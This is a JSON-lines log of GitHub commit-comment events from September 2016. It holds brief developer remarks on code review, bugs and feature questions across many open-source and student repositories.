{"id":"4579616283","type":"CommitCommentEvent","actor":{"login":"osfans"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19070079,"position":null,"line":null,"path":null,"commit_id":"61fe29ec86d241450bcd0cd33d46b1f713d0eb2f","created_at":"2016-09-18T09:38:05Z","updated_at":"2016-09-18T09:38:05Z","body":"@lotem 試了一下map這個匿名函數，果然可以。現在就是try catch那個不太好分拆函數，看來需要每個轉換函數裏都寫一遍。"}},"created_at":"2016-09-18T09:38:05Z"}
{"id":"4579616498","type":"CommitCommentEvent","actor":{"login":"gdi2290"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":19070080,"position":19,"line":233,"path":"config/webpack.common.js","commit_id":"68e796f8578568300d98d206d94381883a61b03b","created_at":"2016-09-18T09:38:15Z","updated_at":"2016-09-18T09:38:15Z","body":"can you make a PR"}},"created_at":"2016-09-18T09:38:15Z"}
{"id":"4579617987","type":"CommitCommentEvent","actor":{"login":"PeratX"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19070084,"position":15,"line":33,"path":"src/pocketmine/block/ActiveRedstoneLamp.php","commit_id":"fdf7e57405e864fe4896cf76b8c51946ed626400","created_at":"2016-09-18T09:39:20Z","updated_at":"2016-09-18T09:39:20Z","body":"The same function"}},"created_at":"2016-09-18T09:39:20Z"}
{"id":"4579619589","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/PocketMine-MP"},"payload":{"comment":{"id":19070087,"position":12,"line":1561,"path":"src/pocketmine/Player.php","commit_id":"15b9578245b691844a4e1227be2c36c68d26b504","created_at":"2016-09-18T09:40:17Z","updated_at":"2016-09-18T09:40:17Z","body":"Yes. $this->getPosition() returns the feet coordinates. But because MCPE is weird, it uses eye coordinates for players. Every other mob, it's the feet. #blameMojang"}},"created_at":"2016-09-18T09:40:17Z"}
{"id":"4579620216","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/PocketMine-MP"},"payload":{"comment":{"id":19070088,"position":null,"line":null,"path":null,"commit_id":"daf56aa8fe08caa4e4e69f604f5e504daf37086f","created_at":"2016-09-18T09:40:46Z","updated_at":"2016-09-18T09:40:46Z","body":"Sign text longer than 16 chars per line = fail"}},"created_at":"2016-09-18T09:40:46Z"}
{"id":"4579621031","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"iTXTech/PocketMine-MP"},"payload":{"comment":{"id":19070089,"position":12,"line":1561,"path":"src/pocketmine/Player.php","commit_id":"15b9578245b691844a4e1227be2c36c68d26b504","created_at":"2016-09-18T09:41:28Z","updated_at":"2016-09-18T09:41:28Z","body":"Yes, the y is different, but on this line, you are only using the x and z, which are the same."}},"created_at":"2016-09-18T09:41:28Z"}
{"id":"4579621666","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"iTXTech/PocketMine-MP"},"payload":{"comment":{"id":19070090,"position":null,"line":null,"path":null,"commit_id":"daf56aa8fe08caa4e4e69f604f5e504daf37086f","created_at":"2016-09-18T09:41:59Z","updated_at":"2016-09-18T09:41:59Z","body":"Isn't it supposed to be disallowed, unless plugins allow it?"}},"created_at":"2016-09-18T09:41:59Z"}
{"id":"4579621986","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/PocketMine-MP"},"payload":{"comment":{"id":19070091,"position":6,"line":78,"path":"src/pocketmine/PocketMine.php","commit_id":"df4c3ec4a68cd6705dd0dd66c0f0e6cc04ff295a","created_at":"2016-09-18T09:42:11Z","updated_at":"2016-09-18T09:42:11Z","body":"It doesn't matter. I could even declare it as 0.15, it doesn't care. As long as it is a valid version string, the game is happy. Just don't try putting 0.15.x"}},"created_at":"2016-09-18T09:42:11Z"}
{"id":"4579622676","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19070093,"position":15,"line":33,"path":"src/pocketmine/block/ActiveRedstoneLamp.php","commit_id":"fdf7e57405e864fe4896cf76b8c51946ed626400","created_at":"2016-09-18T09:42:47Z","updated_at":"2016-09-18T09:42:47Z","body":"Using count()===0 feels safer."}},"created_at":"2016-09-18T09:42:47Z"}
{"id":"4579623458","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/PocketMine-MP"},"payload":{"comment":{"id":19070096,"position":null,"line":null,"path":null,"commit_id":"daf56aa8fe08caa4e4e69f604f5e504daf37086f","created_at":"2016-09-18T09:43:23Z","updated_at":"2016-09-18T09:43:23Z","body":"In vanilla, sign text can be up to the width of the sign. The character count isn't used anymore."}},"created_at":"2016-09-18T09:43:23Z"}
{"id":"4579624723","type":"CommitCommentEvent","actor":{"login":"nitmir"},"repo":{"name":"vauxia/django-cas-server"},"payload":{"comment":{"id":19070099,"position":null,"line":null,"path":null,"commit_id":"284d4d9f55c3dbbec8793b28e60e75de263073cd","created_at":"2016-09-18T09:44:22Z","updated_at":"2016-09-18T09:44:22Z","body":"Thanks for the fixes. They are included in https://github.com/nitmir/django-cas-server/commit/816d350548267c13f93b5778164d6d7c9fb57a71"}},"created_at":"2016-09-18T09:44:22Z"}
{"id":"4579624964","type":"CommitCommentEvent","actor":{"login":"Blucbo"},"repo":{"name":"Blucbo/lections"},"payload":{"comment":{"id":19070100,"position":1,"line":24,"path":"javascript/README.md","commit_id":"729804d3dd9c11ca5328497367781f62655e0455","created_at":"2016-09-18T09:44:32Z","updated_at":"2016-09-18T09:44:32Z","body":"flatten([1, [2, 3], [[4], [5, 6]] ]);"}},"created_at":"2016-09-18T09:44:32Z"}
{"id":"4579626045","type":"CommitCommentEvent","actor":{"login":"zhanglei002"},"repo":{"name":"Qusic/atom-youcompleteme"},"payload":{"comment":{"id":19070102,"position":37,"line":68,"path":"lib/handler.coffee","commit_id":"0bcf9cfa002417a38da3376a3b4793c0334562f0","created_at":"2016-09-18T09:45:22Z","updated_at":"2016-09-18T09:45:22Z","body":"BufferedProcess will fail with 'NOENT' if core.projectHome directory doesn't exist. \r\n\r\n/Applications/Atom.app/Contents/Resources/app.asar/src/buffered-process.js:262 Uncaught BufferedProcessError: Failed to spawn command `python`. Make sure `python` is installed and on your PATH\r\n"}},"created_at":"2016-09-18T09:45:22Z"}
{"id":"4579626280","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/PocketMine-MP"},"payload":{"comment":{"id":19070103,"position":12,"line":1561,"path":"src/pocketmine/Player.php","commit_id":"15b9578245b691844a4e1227be2c36c68d26b504","created_at":"2016-09-18T09:45:31Z","updated_at":"2016-09-18T09:45:31Z","body":"Oh. Yes, you're right. TODO: fix this :)"}},"created_at":"2016-09-18T09:45:31Z"}
{"id":"4579626641","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/PocketMine-MP"},"payload":{"comment":{"id":19070104,"position":12,"line":1561,"path":"src/pocketmine/Player.php","commit_id":"15b9578245b691844a4e1227be2c36c68d26b504","created_at":"2016-09-18T09:45:48Z","updated_at":"2016-09-18T09:45:48Z","body":"although it shouldn't actually make any real difference"}},"created_at":"2016-09-18T09:45:48Z"}
{"id":"4579628231","type":"CommitCommentEvent","actor":{"login":"YoBii"},"repo":{"name":"Ar1i/PokemonGo-Bot"},"payload":{"comment":{"id":19070106,"position":null,"line":null,"path":null,"commit_id":"8c6213aa2847b88bf505698f36e04b48b234ac3c","created_at":"2016-09-18T09:47:02Z","updated_at":"2016-09-18T09:47:02Z","body":"l. 1400 ; missing?"}},"created_at":"2016-09-18T09:47:02Z"}
{"id":"4579629609","type":"CommitCommentEvent","actor":{"login":"Linjieqiang"},"repo":{"name":"betaflight/betaflight-configurator"},"payload":{"comment":{"id":19070110,"position":null,"line":null,"path":null,"commit_id":"f3bfb085f8dd798a41f4de05679f720511781cfc","created_at":"2016-09-18T09:48:06Z","updated_at":"2016-09-18T09:48:06Z","body":"Hi guy,I want to know how to generate a new user-defined mcm file?"}},"created_at":"2016-09-18T09:48:06Z"}
{"id":"4579630299","type":"CommitCommentEvent","actor":{"login":"eligao"},"repo":{"name":"eligao/python-telegram-bot"},"payload":{"comment":{"id":19070111,"position":null,"line":null,"path":null,"commit_id":"32c2c9ac354cb1b40b4303cd1c52cba3169f80f0","created_at":"2016-09-18T09:48:37Z","updated_at":"2016-09-18T09:48:37Z","body":"Assume we got a command with more than one continuous white-space characters (which does happen) :\r\n\r\n> /func[space][space]arg1[space]arg2[space][space]arg3[space][space][space]arg4\r\n\r\nafter `split(' ')`, we have\r\n`['/func', '', 'arg1', 'arg2', '', 'arg3', '', '', 'arg4']`\r\nwhich includes many unnecessary empty strings that leads to improper command handling.\r\nThis is also different from how the system handles standard `argv[]`.\r\nHowever with `split()`, we have the proper parameters:\r\n`['/func', 'arg1', 'arg2', 'arg3',  'arg4']`\r\nAlso it eliminates other unnecessary white-spaces like `\\r`,`\\n`, etc."}},"created_at":"2016-09-18T09:48:37Z"}
{"id":"4579631270","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"iTXTech/PocketMine-MP"},"payload":{"comment":{"id":19070112,"position":12,"line":1561,"path":"src/pocketmine/Player.php","commit_id":"15b9578245b691844a4e1227be2c36c68d26b504","created_at":"2016-09-18T09:49:16Z","updated_at":"2016-09-18T09:49:16Z","body":"Yep. I was just wondering why you changed this. There is no big deal if it changes or not, unless you are writing a pull request, and then some PR handler spotted this and start suspecting that you try to write extra lines to get more contribution :stuck_out_tongue: "}},"created_at":"2016-09-18T09:49:16Z"}
{"id":"4579632953","type":"CommitCommentEvent","actor":{"login":"agc0610"},"repo":{"name":"Devbootcamp/phase-0-tracks"},"payload":{"comment":{"id":19070116,"position":null,"line":null,"path":null,"commit_id":"07667461c162c53a5b33fbc1499ca8be101f196d","created_at":"2016-09-18T09:50:30Z","updated_at":"2016-09-18T09:50:30Z","body":"Tagging @mechamanny per the lesson. -AG"}},"created_at":"2016-09-18T09:50:30Z"}
{"id":"4579637728","type":"CommitCommentEvent","actor":{"login":"mohammedzubair"},"repo":{"name":"mohammedzubair/java"},"payload":{"comment":{"id":19070122,"position":null,"line":null,"path":null,"commit_id":"12a92db8168098a80e59a3332c2d8a37ba703019","created_at":"2016-09-18T09:54:06Z","updated_at":"2016-09-18T09:54:06Z","body":"delete"}},"created_at":"2016-09-18T09:54:06Z"}
{"id":"4579638389","type":"CommitCommentEvent","actor":{"login":"sypherce"},"repo":{"name":"sypherce/ds2key"},"payload":{"comment":{"id":19070123,"position":null,"line":null,"path":null,"commit_id":"146a0b76ad87ae9a17e682448983944f7c75b882","created_at":"2016-09-18T09:54:34Z","updated_at":"2016-09-18T09:54:34Z","body":"Involves issue #31"}},"created_at":"2016-09-18T09:54:34Z"}
{"id":"4579642730","type":"CommitCommentEvent","actor":{"login":"iketari"},"repo":{"name":"SchadkoAO/technolibs"},"payload":{"comment":{"id":19070131,"position":19,"line":17,"path":"index.js","commit_id":"bc4821ad2813b0daf41a4e211d06124465b60193","created_at":"2016-09-18T09:57:46Z","updated_at":"2016-09-18T09:57:46Z","body":"Ну ты понял, что не так, да?)))"}},"created_at":"2016-09-18T09:57:46Z"}
{"id":"4580882727","type":"CommitCommentEvent","actor":{"login":"rob3c"},"repo":{"name":"ibgib/ibgib"},"payload":{"comment":{"id":19072680,"position":null,"line":null,"path":null,"commit_id":"566c5c5e80e43147554a06d48c45bd07ecf2542f","created_at":"2016-09-19T00:00:22Z","updated_at":"2016-09-19T00:00:22Z","body":"I like the updated diagram - it makes more sense :-)"}},"created_at":"2016-09-19T00:00:22Z"}
{"id":"4580884742","type":"CommitCommentEvent","actor":{"login":"adriennebelle"},"repo":{"name":"adriennebelle/phase-0-tracks"},"payload":{"comment":{"id":19072683,"position":null,"line":null,"path":null,"commit_id":"6ae65283e9efe8166dd11e2799464b1c330c6b58","created_at":"2016-09-19T00:01:36Z","updated_at":"2016-09-19T00:01:36Z","body":"@bontgoy Hey Ty - I did the solo challenge first before the other assignments. It works, but I'm definitely excited for the group study to hear about how everyone else did. I assume we're allowed to talk about our solo challenges after the fact?"}},"created_at":"2016-09-19T00:01:36Z"}
{"id":"4580885301","type":"CommitCommentEvent","actor":{"login":"FloEdelmann"},"repo":{"name":"FloEdelmann/fixture-converter"},"payload":{"comment":{"id":19072685,"position":null,"line":null,"path":null,"commit_id":"88d7c2a3b9a1dcebbe174fa23d3709acbd0cf5c1","created_at":"2016-09-19T00:01:59Z","updated_at":"2016-09-19T00:01:59Z","body":"This is very resource intensive, maybe a kind of binary search might help?"}},"created_at":"2016-09-19T00:01:59Z"}
{"id":"4580887667","type":"CommitCommentEvent","actor":{"login":"eulerto"},"repo":{"name":"eulerto/pg_similarity"},"payload":{"comment":{"id":19072688,"position":null,"line":null,"path":null,"commit_id":"be1a8b08c8716e59b89982557da9ea68cdf868c5","created_at":"2016-09-19T00:02:54Z","updated_at":"2016-09-19T00:02:54Z","body":"@shapiro2 Why? arow and brow must be the same size."}},"created_at":"2016-09-19T00:02:54Z"}
{"id":"4580889741","type":"CommitCommentEvent","actor":{"login":"bill-mybiz"},"repo":{"name":"ibgib/ibgib"},"payload":{"comment":{"id":19072690,"position":null,"line":null,"path":null,"commit_id":"566c5c5e80e43147554a06d48c45bd07ecf2542f","created_at":"2016-09-19T00:04:26Z","updated_at":"2016-09-19T00:04:26Z","body":"Hah...you found the hidden commit comment update thingy! The structure fix has been in my mind for a long time, and now it was time to actually do it. It's just tough to take apart something that is \"working\" so you can put it back together to work better. I'm working on slightly altering the transforms to do \"variable\" transforms...it's all coming together..."}},"created_at":"2016-09-19T00:04:26Z"}
{"id":"4580893745","type":"CommitCommentEvent","actor":{"login":"Vidigan"},"repo":{"name":"Vidigan/EDL"},"payload":{"comment":{"id":19072698,"position":null,"line":null,"path":null,"commit_id":"565496e79809b0c6eae83bc1c9107e834d82bd4e","created_at":"2016-09-19T00:07:19Z","updated_at":"2016-09-19T00:07:19Z","body":"\nOk, hoje mesmo reformularei aquele trabalho\n\n________________________________\nDe: fsantanna <notifications@github.com>\nEnviado: domingo, 18 de setembro de 2016 20:59:26\nPara: Vidigan/EDL\nCc: Luca Ribeiro Pereira Carneiro; Comment\nAssunto: Re: [Vidigan/EDL] Update ARTIGO.md (565496e)\n\n\nDesculpe Luca, me perdi e n?o respondi essa mensagem. Sim, voc? pode. Recomendo para melhorar um pouco a sua nota nesse trabalho.\n\n-\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub<https://github.com/Vidigan/EDL/commit/565496e79809b0c6eae83bc1c9107e834d82bd4e#commitcomment-19072672>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AIqdShkuQC2QJHPeHDdyhWmbVZmy5H5iks5qrdBegaJpZM4Jz3oB>.\n"}},"created_at":"2016-09-19T00:07:19Z"}
{"id":"4580897585","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"TusharShah222/dsp"},"payload":{"comment":{"id":19072702,"position":null,"line":null,"path":null,"commit_id":"ce59b290c5843c242473f2551d04fec9ab0bfab6","created_at":"2016-09-19T00:10:12Z","updated_at":"2016-09-19T00:10:12Z","body":"RE: 05a-python.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @TusharShah222 \r\n\r\nNice work on Python! Here are some comments:\r\n- Q3: Can you give an example of `lambda` in the `key` argument of `sorted()`?\r\n- Q4: Your example for `filter()` is a bit mangled, perhaps partly a result of trouble with markdown?\r\n- Q5: To get days from `deltadate`, just use `deltadate.days`.\r\n- Q6, `both_ends`: the empty string is `''`, not `' '`.\r\n- Q6, `verbing`: your implementation does not leave the string unchanged if its length is less than 3.\r\n- Q7, `match_ends`: This function should just return a count, not a count and a list. In addition, the count should be that of words with length>=2 and with identical first and last letters. Right now count is set to the length of the input list. Finally, words such as 'aa' are not included in the output list, even though they should be.\r\n- Q7, `sort_last`: This function does not return anything.\r\n- Q7, `remove_adjacent([2,2,3,3,3,2])` should return `[2,3,2]`; it returns `[3,2]`.\r\n- Q8: so what is the name of the team with the smallest difference between goals and goals allowed?"}},"created_at":"2016-09-19T00:10:12Z"}
{"id":"4580898892","type":"CommitCommentEvent","actor":{"login":"cipri-tom"},"repo":{"name":"zhao-xu/Wox"},"payload":{"comment":{"id":19072704,"position":null,"line":null,"path":null,"commit_id":"e762a69880b32e21110615b62fb2b565782e46eb","created_at":"2016-09-19T00:11:07Z","updated_at":"2016-09-19T00:11:07Z","body":"Any idea when this will be integrated into the release ? Thank you!"}},"created_at":"2016-09-19T00:11:07Z"}
{"id":"4580899655","type":"CommitCommentEvent","actor":{"login":"leif81"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19072706,"position":null,"line":null,"path":null,"commit_id":"914d1d3a584e5d7cb185084802dc3cfecd245a64","created_at":"2016-09-19T00:11:42Z","updated_at":"2016-09-19T00:11:42Z","body":"Very cool :+1: "}},"created_at":"2016-09-19T00:11:42Z"}
{"id":"4580901288","type":"CommitCommentEvent","actor":{"login":"ToadKing"},"repo":{"name":"libretro/Genesis-Plus-GX"},"payload":{"comment":{"id":19072707,"position":null,"line":null,"path":null,"commit_id":"64ee605076b4f63e3a3a65316323cc61f210f030","created_at":"2016-09-19T00:12:54Z","updated_at":"2016-09-19T00:12:54Z","body":"Yes, that is what I did.\r\n\r\nHowever, with this new discovery of Emscripten optimizing byte arrays differently you may have to debug it from an Emscripten build itself. You can do that by compiling a debug build with the extra `-s SAFE_HEAP=1` command to the compile and linker calls. The program will throw an assert on any bad memory access to the browser terminal and you can track it down from there."}},"created_at":"2016-09-19T00:12:54Z"}
{"id":"4580902056","type":"CommitCommentEvent","actor":{"login":"majorcyto"},"repo":{"name":"LeagueSandbox/GameServer"},"payload":{"comment":{"id":19072710,"position":null,"line":null,"path":null,"commit_id":"877881acdc0e9817faf672ef17aac17b70787058","created_at":"2016-09-19T00:13:32Z","updated_at":"2016-09-19T00:13:32Z","body":"Nice commit! Good work @FurkanS1821 "}},"created_at":"2016-09-19T00:13:32Z"}
{"id":"4580903176","type":"CommitCommentEvent","actor":{"login":"jfkthame"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19072712,"position":120,"line":1888,"path":"css-fonts/Fonts.src.html","commit_id":"88471113c35fd19a98f43eecbd0302e1466a06ba","created_at":"2016-09-19T00:14:26Z","updated_at":"2016-09-19T00:14:26Z","body":"I don't think ranges make font selection difficult. A range in a @font-face descriptor just means that the face matches any property value within that range. If there are multiple faces that are equally good matches for all the font properties specified, the last face specified would override any earlier faces.\r\n\r\nRanges make it easy for authors to control exactly what property values are mapped to each resource. Doing this with single-valued descriptors and relying on a deep understanding of the font selection to achieve the desired result is much less author-friendly.\r\n"}},"created_at":"2016-09-19T00:14:26Z"}
{"id":"4580904414","type":"CommitCommentEvent","actor":{"login":"leif81"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19072715,"position":12,"line":289,"path":"index.html","commit_id":"914d1d3a584e5d7cb185084802dc3cfecd245a64","created_at":"2016-09-19T00:15:23Z","updated_at":"2016-09-19T00:15:23Z","body":"Maybe store the `JSON.parse`'d value in `authObject` so we don't have to do `JSON.parse` each time we need a value?"}},"created_at":"2016-09-19T00:15:23Z"}
{"id":"4580908478","type":"CommitCommentEvent","actor":{"login":"lucaspeixotot"},"repo":{"name":"sergioamorim/iface-profile"},"payload":{"comment":{"id":19072719,"position":null,"line":null,"path":null,"commit_id":"12fea40628afb41a3d90c75aca162ec490d1110a","created_at":"2016-09-19T00:18:24Z","updated_at":"2016-09-19T00:18:24Z","body":"Thanks."}},"created_at":"2016-09-19T00:18:24Z"}
{"id":"4580908499","type":"CommitCommentEvent","actor":{"login":"AlexIIL"},"repo":{"name":"AlexIIL/BuildCraft"},"payload":{"comment":{"id":19072720,"position":22,"line":226,"path":"common/buildcraft/lib/tile/TileBC_Neptune.java","commit_id":"a186901bb17db31b089826cb0a77be0bb142c401","created_at":"2016-09-19T00:18:25Z","updated_at":"2016-09-19T00:18:25Z","body":"Debug particles! These will be removed or put behind the BC debugging option in the future"}},"created_at":"2016-09-19T00:18:25Z"}
{"id":"4580909217","type":"CommitCommentEvent","actor":{"login":"Gaelan"},"repo":{"name":"Vazkii/Botania"},"payload":{"comment":{"id":19072723,"position":null,"line":null,"path":null,"commit_id":"4d4bd7efc4986f6f97040304270be5865c6e22fb","created_at":"2016-09-19T00:18:58Z","updated_at":"2016-09-19T00:18:58Z","body":"Nooooooooo"}},"created_at":"2016-09-19T00:18:58Z"}
{"id":"4580911661","type":"CommitCommentEvent","actor":{"login":"flaminisx"},"repo":{"name":"SashaUkraine/SuccessClubSite"},"payload":{"comment":{"id":19072728,"position":null,"line":null,"path":null,"commit_id":"0708baaba1e6ebd52ce8b7651bfea96c0348f30f","created_at":"2016-09-19T00:20:43Z","updated_at":"2016-09-19T00:20:43Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;dHsPbG2j&#x2F;16-nginx\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Перевести на nginx</a>"}},"created_at":"2016-09-19T00:20:43Z"}
{"id":"4580911664","type":"CommitCommentEvent","actor":{"login":"flaminisx"},"repo":{"name":"SashaUkraine/SuccessClubSite"},"payload":{"comment":{"id":19072729,"position":null,"line":null,"path":null,"commit_id":"0708baaba1e6ebd52ce8b7651bfea96c0348f30f","created_at":"2016-09-19T00:20:43Z","updated_at":"2016-09-19T00:20:43Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;dHsPbG2j&#x2F;16-nginx\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Перевести на nginx</a>"}},"created_at":"2016-09-19T00:20:43Z"}
{"id":"4580911740","type":"CommitCommentEvent","actor":{"login":"cbulow"},"repo":{"name":"cbulow/group_humann2_uniref_abundances_to_GO"},"payload":{"comment":{"id":19072730,"position":null,"line":null,"path":null,"commit_id":"7e080aea0fc444dae4388c9e880d47783dbce166","created_at":"2016-09-19T00:20:47Z","updated_at":"2016-09-19T00:20:47Z","body":"updated test data input file path and expected output file paths to point to multisample test files"}},"created_at":"2016-09-19T00:20:47Z"}
{"id":"4580915017","type":"CommitCommentEvent","actor":{"login":"gizzmojr"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19072740,"position":12,"line":289,"path":"index.html","commit_id":"914d1d3a584e5d7cb185084802dc3cfecd245a64","created_at":"2016-09-19T00:23:13Z","updated_at":"2016-09-19T00:23:13Z","body":"Sure, I'll loop through it and build up the object that way. Simple solution I should of caught :smile: "}},"created_at":"2016-09-19T00:23:13Z"}
{"id":"4580915083","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19072741,"position":null,"line":null,"path":null,"commit_id":"3d56f89230c915553c1e81ef9e4d05411ddccf6a","created_at":"2016-09-19T00:23:17Z","updated_at":"2016-09-19T00:23:17Z","body":":))"}},"created_at":"2016-09-19T00:23:17Z"}
{"id":"4580917861","type":"CommitCommentEvent","actor":{"login":"SergeyMalkin"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19072748,"position":120,"line":1888,"path":"css-fonts/Fonts.src.html","commit_id":"88471113c35fd19a98f43eecbd0302e1466a06ba","created_at":"2016-09-19T00:25:21Z","updated_at":"2016-09-19T00:25:21Z","body":"And you will need 4 declarations for two axis and 8 for three. \r\n\r\nFor overlapping ranges we can choose first matching one, or later find better preferences based on scenarios we just don't know yet. And this is not unique to @font-face, installed fonts have same problem. @font-face is actually better: you can define ranges so they are not intersecting.\r\n\r\nLet's discuss, although I am not sure I'll be able to call in."}},"created_at":"2016-09-19T00:25:21Z"}
{"id":"4580918123","type":"CommitCommentEvent","actor":{"login":"leif81"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19072749,"position":12,"line":289,"path":"index.html","commit_id":"914d1d3a584e5d7cb185084802dc3cfecd245a64","created_at":"2016-09-19T00:25:33Z","updated_at":"2016-09-19T00:25:33Z","body":"Like even `authObject = JSON.parse(localStorage.getItem(bzSiteUrl);` may work. And then else where just do `authObject.userId`, etc. Haven't tried though."}},"created_at":"2016-09-19T00:25:33Z"}
{"id":"4580921144","type":"CommitCommentEvent","actor":{"login":"Beloya"},"repo":{"name":"EdmondFrank/Esurfing"},"payload":{"comment":{"id":19072757,"position":null,"line":null,"path":null,"commit_id":"7b9eb13f361b83f23a354ca43e0867abad19b24d","created_at":"2016-09-19T00:27:47Z","updated_at":"2016-09-19T00:27:47Z","body":"天翼算法已经更新了吧，这个估计就要失效了"}},"created_at":"2016-09-19T00:27:47Z"}
{"id":"4580927480","type":"CommitCommentEvent","actor":{"login":"Pengcheng-Wang"},"repo":{"name":"Pengcheng-Wang/HelloWorld"},"payload":{"comment":{"id":19072765,"position":null,"line":null,"path":null,"commit_id":"7a6e5c9d9b66932905069c5e7951871af2f8120c","created_at":"2016-09-19T00:32:30Z","updated_at":"2016-09-19T00:32:30Z","body":"Added some explanation for demonstration."}},"created_at":"2016-09-19T00:32:30Z"}
{"id":"4580932697","type":"CommitCommentEvent","actor":{"login":"gizzmojr"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19072773,"position":12,"line":289,"path":"index.html","commit_id":"914d1d3a584e5d7cb185084802dc3cfecd245a64","created_at":"2016-09-19T00:36:36Z","updated_at":"2016-09-19T00:36:36Z","body":"Did exactly that already in 79bb5de94c6ce9c11d6db965b4a6f9f86a1803b4"}},"created_at":"2016-09-19T00:36:36Z"}
{"id":"4580934444","type":"CommitCommentEvent","actor":{"login":"case-eee"},"repo":{"name":"lucyfox4131/ruby-submissions"},"payload":{"comment":{"id":19072776,"position":null,"line":null,"path":null,"commit_id":"5e0f7fe7e66e9276e599b5d677bc64ca8e52b647","created_at":"2016-09-19T00:37:59Z","updated_at":"2016-09-19T00:37:59Z","body":"Thank you!!\n\nOn Sunday, September 18, 2016, Susi Irwin <notifications@github.com> wrote:\n\n> Susi Irwin - adds MixMaster links\n>\n> @case-eee and s-espinosa - my links have been added to the repo list.\n> Thanks!\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/lucyfox4131/ruby-submissions/commit/\n> 5e0f7fe7e66e9276e599b5d677bc64ca8e52b647\n>\n"}},"created_at":"2016-09-19T00:37:59Z"}
{"id":"4580934652","type":"CommitCommentEvent","actor":{"login":"igortouguinho"},"repo":{"name":"igortouguinho/EDL"},"payload":{"comment":{"id":19072777,"position":null,"line":null,"path":null,"commit_id":"c2e7fd0c3b1d8e4de52f9631a9fb3599e7a1d742","created_at":"2016-09-19T00:38:10Z","updated_at":"2016-09-19T00:38:10Z","body":"Pode distribuir meio a meio professor."}},"created_at":"2016-09-19T00:38:10Z"}
{"id":"4580942101","type":"CommitCommentEvent","actor":{"login":"gfsoileau"},"repo":{"name":"hengrumay/dsp"},"payload":{"comment":{"id":19072794,"position":null,"line":null,"path":null,"commit_id":"df1330e6c53d40a7860bd04c55897120fb992d0b","created_at":"2016-09-19T00:43:28Z","updated_at":"2016-09-19T00:43:28Z","body":"Hi Hang-Ru,\r\n\r\nNice work on the Python section :+1: . We really appreciate your articulate and details answers on the python questions. A fun exercise might be using the same example for list comprehensions, map/filter. "}},"created_at":"2016-09-19T00:43:28Z"}
{"id":"4580942244","type":"CommitCommentEvent","actor":{"login":"jules2689"},"repo":{"name":"richardwu/news_scraper"},"payload":{"comment":{"id":19072795,"position":6,"line":10,"path":"news_scraper.gemspec","commit_id":"240f483ad844468687e22153ff030831c8fa28d3","created_at":"2016-09-19T00:43:34Z","updated_at":"2016-09-19T00:43:34Z","body":"we can add 'julian@jnadeau.ca' here too :) Thanks for adding thing tho"}},"created_at":"2016-09-19T00:43:34Z"}
{"id":"4580943808","type":"CommitCommentEvent","actor":{"login":"GalaticStryder"},"repo":{"name":"GalaticStryder/kernel_lge_msm8974"},"payload":{"comment":{"id":19072796,"position":null,"line":null,"path":null,"commit_id":"d8dd9d6af3907c521ef034d3582f638e5dedf415","created_at":"2016-09-19T00:44:39Z","updated_at":"2016-09-19T00:44:39Z","body":"Consider this change in bad state, I'll amend author tomorrow."}},"created_at":"2016-09-19T00:44:39Z"}
{"id":"4580944409","type":"CommitCommentEvent","actor":{"login":"chrwei"},"repo":{"name":"CuriousTech/ESP8266-HVAC"},"payload":{"comment":{"id":19072799,"position":4,"line":793,"path":"Arduino/pages.h","commit_id":"6789ff66fe41125c3f181fea56d8adfa338932e9","created_at":"2016-09-19T00:45:07Z","updated_at":"2016-09-19T00:45:07Z","body":"just did a merge and noticed this, this looks like it might not produce valid data..."}},"created_at":"2016-09-19T00:45:07Z"}
{"id":"4580945726","type":"CommitCommentEvent","actor":{"login":"Daniel15"},"repo":{"name":"Taritsyn/JavaScriptEngineSwitcher"},"payload":{"comment":{"id":19072803,"position":null,"line":null,"path":null,"commit_id":"ed045a5b51cf6b4b6ca635b3b88a2e042bf3dc7d","created_at":"2016-09-19T00:46:04Z","updated_at":"2016-09-19T00:46:04Z","body":"Thank you! This is very useful 😄 "}},"created_at":"2016-09-19T00:46:04Z"}
